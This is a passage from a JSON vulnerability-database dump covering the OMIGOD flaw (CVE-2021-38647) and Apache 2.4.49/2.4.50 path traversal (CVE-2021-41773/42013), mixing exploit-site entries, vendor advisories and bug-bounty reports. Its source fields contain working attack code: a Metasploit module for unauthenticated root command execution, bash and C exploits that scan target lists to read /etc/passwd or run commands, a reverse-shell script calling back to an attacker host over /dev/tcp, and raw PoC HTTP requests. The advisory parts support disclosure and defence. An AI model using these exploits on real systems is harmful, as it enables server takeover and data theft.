"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-31T00:00:00", "type": "zdt", "title": "Microsoft OMI Management Interface Authentication Bypass Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-10-31T00:00:00", "id": "1337DAY-ID-36967", "href": "https://0day.today/exploit/description/36967", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n XML_NS = { 'p' => 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem' }.freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft OMI Management Interface Authentication Bypass',\n 'Description' => %q{\n By removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint\n that will cause it to execute an operating system command as the root user. This vulnerability was patched in\n OMI version 1.6.8-1 (released September 8th 2021).\n },\n 'Author' => [\n 'Nir Ohfeld', # vulnerability discovery & research\n 'Shir Tamari', # vulnerability discovery & research\n 'Spencer McIntyre', # metasploit module\n 'wvu' # vulnerability research\n ],\n 'References' => [\n ['CVE', '2021-38647'],\n ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647'],\n ['URL', 'https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure'],\n ['URL', 'https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/'],\n ['URL', 'https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647']\n ],\n 'DisclosureDate' => '2021-09-14',\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux', 'unix'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'RPORT' => 5985,\n 'SSL' => false,\n 'MeterpreterTryToFork' => true\n },\n 'Notes' => {\n 'AKA' => ['OMIGOD'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/wsman'])\n ])\n end\n\n def check\n http_res = send_command('id')\n return CheckCode::Unknown if http_res.nil?\n return CheckCode::Safe unless http_res.code == 200\n\n cmd_res = parse_response(http_res)\n return CheckCode::Unknown if cmd_res.nil? || cmd_res[:stdout] !~ /uid=(\\d+)\\(\\S+\\) /\n\n return CheckCode::Vulnerable(\"Command executed as uid #{Regexp.last_match(1)}.\")\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n result = execute_command(payload.encoded)\n if result\n print_status(result[:stdout]) unless result[:stdout].blank?\n print_error(result[:stderr]) unless result[:stderr].blank?\n end\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n res = send_command(cmd)\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\")\n end\n\n parse_response(res)\n end\n\n def parse_response(res)\n return nil unless res&.code == 200\n\n return_code = res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:ReturnCode', XML_NS)&.content.to_i\n unless return_code == 0\n print_error(\"Failed to execute command: #{cmd} (status: #{return_code})\")\n end\n\n {\n return_code: return_code,\n stdout: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdOut', XML_NS)&.content,\n stderr: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdErr', XML_NS)&.content\n }\n end\n\n def send_command(cmd)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'ctype' => 'text/xml;charset=UTF-8',\n 'data' => Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)\n <s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\" xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\" xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n <s:Header>\n <a:To>HTTP://127.0.0.1:5985/wsman/</a:To>\n <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n <a:ReplyTo>\n <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n </a:ReplyTo>\n <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n <a:MessageID>uuid:#{Faker::Internet.uuid}</a:MessageID>\n <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <w:OptionSet s:mustUnderstand=\"true\"/>\n <w:SelectorSet>\n <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n </w:SelectorSet>\n </s:Header>\n <s:Body>\n <p:ExecuteScript_INPUT xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n <p:Script>#{Rex::Text.encode_base64(cmd)}</p:Script>\n <p:Arguments/>\n <p:timeout>0</p:timeout>\n <p:b64encoded>true</p:b64encoded>\n </p:ExecuteScript_INPUT>\n </s:Body>\n </s:Envelope>\n ENVELOPE\n )\n end\nend\n", "sourceHref": "https://0day.today/exploit/36967", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-03T01:52:37", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-13T00:00:00", "type": "zdt", "title": "Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-13T00:00:00", "id": "1337DAY-ID-36897", "href": "https://0day.today/exploit/description/36897", "sourceData": "# Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)\n# Exploit Author: Lucas Souza https://lsass.io\n# Vendor Homepage: https://apache.org/\n# Version: 2.4.50\n# Tested on: 2.4.50\n# CVE : CVE-2021-42013\n# Credits: Ash Daulton and the cPanel Security Team\n\n#!/bin/bash\n\nif [[ $1 == '' ]]; [[ $2 == '' ]]; then\necho Set [TAGET-LIST.TXT] [PATH] [COMMAND]\necho ./PoC.sh targets.txt /etc/passwd\necho ./PoC.sh targets.txt /bin/sh id\n\nexit\nfi\nfor host in $(cat $1); do\necho $host\ncurl -s --path-as-is -d \"echo Content-Type: text/plain; echo; $3\" \"$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2\"; done\n\n# PoC.sh targets.txt /etc/passwd\n# PoC.sh targets.txt /bin/sh whoami\n", "sourceHref": "https://0day.today/exploit/36897", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-07T08:00:41", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T00:00:00", "type": "zdt", "title": "Apache 2.4.50 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-06-07T00:00:00", "id": "1337DAY-ID-37777", "href": "https://0day.today/exploit/description/37777", "sourceData": "#include <stdio.h>\n#include <stdlib.h>\n#include <stdbool.h>\n#include <string.h>\n#include <curl/curl.h>\n\n/* Apache 2.4.50 exploit (CVE-2021-42013)\n * Author: Vilius Povilaika\n * Website: www.povilaika.com */\n\n// compile: $ gcc cve-2021-42013.c -lcurl -o cve-2021-42013\n\nint usage(char* prog)\n{\n printf(\"Usage: %s <host> <exec>\\n\", prog);\n printf(\" - %s https://127.0.0.1 \\\"uname -a\\\"\\n\", prog);\n return 0;\n}\n\nbool error(const char* reason)\n{\n printf(\"[ERR] Critical error - %s\\n\", reason);\n return false;\n}\n\nstruct callback_result {\n char* data;\n size_t size;\n};\n\nstatic size_t callback(void* pointer, size_t size, size_t nmemb, void* data)\n{\n struct callback_result *memory = (struct callback_result *)data;\n char* ptr = realloc(memory->data, memory->size+nmemb+1);\n memory->data = ptr;\n memcpy(&(memory->data[memory->size]), pointer, nmemb);\n memory->size += nmemb;\n memory->data[memory->size] = 0;\n return nmemb;\n}\n\nbool exploit(void* result, char* host, char* exec)\n{\n CURL *curl = curl_easy_init();\n char url[256];\n sprintf(url, \"%s/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh\", host);\n curl_easy_setopt(curl, CURLOPT_URL, url);\n char payload[256];\n sprintf(payload, \"echo Content-Type: text/plain; echo; %s\", exec);\n curl_easy_setopt(curl, CURLOPT_POSTFIELDS, payload);\n curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, callback);\n curl_easy_setopt(curl, CURLOPT_WRITEDATA, result);\n int res = curl_easy_perform(curl);\n if (res != CURLE_OK)\n return error(curl_easy_strerror(res));\n curl_easy_cleanup(curl);\n return true;\n}\n\nint main(int argc, char* argv[])\n{\n if (argc != 3)\n return usage(argv[0]);\n struct callback_result result = {0};\n bool res = exploit(&result, argv[1], argv[2]);\n if (res)\n printf(\"[+] Exploit finished successfully, check output\\n\");\n else\n printf(\"[-] Exploit failed, check output\\n\");\n printf(\" \\n%s\\n\", result.data);\n return 0;\n}\n", "sourceHref": "https://0day.today/exploit/37777", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-16T05:38:55", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-25T00:00:00", "type": "zdt", "title": "Apache HTTP Server 2.4.50 - Remote Code Execution Exploit (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-25T00:00:00", "id": "1337DAY-ID-36937", "href": "https://0day.today/exploit/description/36937", "sourceData": "# Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)\n# Credits: Ash Daulton & cPanel Security Team\n# Exploit Author: TheLastVvV.com\n# Vendor Homepage: https://apache.org/\n# Version: Apache 2.4.50 with CGI enable\n# Tested on : Debian 5.10.28\n# CVE : CVE-2021-42013\n\n#!/bin/bash\n\necho 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI'\nif [ $# -eq 0 ]\nthen\necho \"try: ./$0 http://ip:port LHOST LPORT\"\nexit 1\nfi\ncurl \"$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh\" -d \"echo Content-Type: text/plain; echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh\" && curl \"$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh\" -d \"echo Content-Type: text/plain; echo; bash /tmp/revoshell.sh\"\n\n#usage chmod -x CVE-2021-42013.sh\n#./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT\n", "sourceHref": "https://0day.today/exploit/36937", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-04T15:49:47", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-06T00:00:00", "type": "zdt", "title": "Apache HTTP Server 2.4.49 - Path Traversal Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-06T00:00:00", "id": "1337DAY-ID-36854", "href": "https://0day.today/exploit/description/36854", "sourceData": "# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal\n# Exploit Author: Lucas Souza https://lsass.io\n# Vendor Homepage: https://apache.org/\n# Version: 2.4.49\n# Tested on: 2.4.49\n# CVE : CVE-2021-41773\n# Credits: Ash Daulton and the cPanel Security Team\n\n#!/bin/bash\n\nif [[ $1 =3D=3D '' ]]; [[ $2 =3D=3D '' ]]; then\necho Set [TAGET-LIST.TXT] [PATH]\necho ./PoC.sh targets.txt /etc/passwd\nexit\nfi\nfor host in $(cat $1); do\ncurl --silent --path-as-is --insecure \"$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2\"; done\n", "sourceHref": "https://0day.today/exploit/36854", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "httpd": [{"lastseen": "2022-03-17T19:28:46", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. \n\nIf files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T00:00:00", "type": "httpd", "title": "Apache Httpd < 2.4.51 : Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "HTTPD:E1C40920F9DFC60284EEE7539DA30483", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T17:50:44", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nIf files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.\n\nThis issue is known to be exploited in the wild.\n\nThis issue only affects Apache 2.4.49 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-09-29T00:00:00", "type": "httpd", "title": "Apache Httpd < 2.4.50 : Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-04T00:00:00", "id": "HTTPD:2C849FE5B165E832EE21ADAECFA9521C", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "hackerone": [{"lastseen": "2023-03-22T23:27:27", "bounty": 1000.0, "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\n-\nMy friend Juan Escobar @itsecurityco and me (Fernando Munoz) reported this internally to Apache HTTPd project and worked with them to test the new patch before the new version was released.\n\n## Impact\n\nIf files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-14T23:54:06", "type": "hackerone", "title": "Internet Bug Bounty: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) (CVE-2021-42013)", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-19T00:14:57", "id": "H1:1400238", "href": "https://hackerone.com/reports/1400238", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-22T23:27:35", "bounty": 4000.0, "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.\n\n## Impact\n\nThe attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-08T21:47:54", "type": "hackerone", "title": "Internet Bug Bounty: Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-09T20:19:52", "id": "H1:1394916", "href": "https://hackerone.com/reports/1394916", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-22T23:27:27", "bounty": 1000.0, "description": "Hello Apache team,\n\n@fms and myself were able to bypass the latest patch for CVE 2021-41773 in the Apache 2.4.50.\n\nThese are the payloads:\n\n1) %%32%65%%32%65\n2) .%%32%65\n3) .%%32e\n4) .%2%65\n\nPoC Path Traversal\n\nGET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\nHost: localhost:83\nsec-ch-ua: \";Not A Brand\";v=\"99\", \"Chromium\";v=\"94\"\nsec-ch-ua-mobile: ?0\nsec-ch-ua-platform: \"Windows\"\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: none\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\nPoC RCE\n\nPOST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\nHost: 192.168.88.201\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9,es;q=0.8\nIf-None-Match: \"2aa6-5cda88e8a6005-gzip\"\nIf-Modified-Since: Wed, 06 Oct 2021 05:38:33 GMT\nConnection: close\nContent-Length: 60\n\necho Content-Type: text/plain; echo; id; uname;apache2ctl -M\n\n## Impact\n\nAn attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nIf files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-18T21:56:01", "type": "hackerone", "title": "Internet Bug Bounty: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.50", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 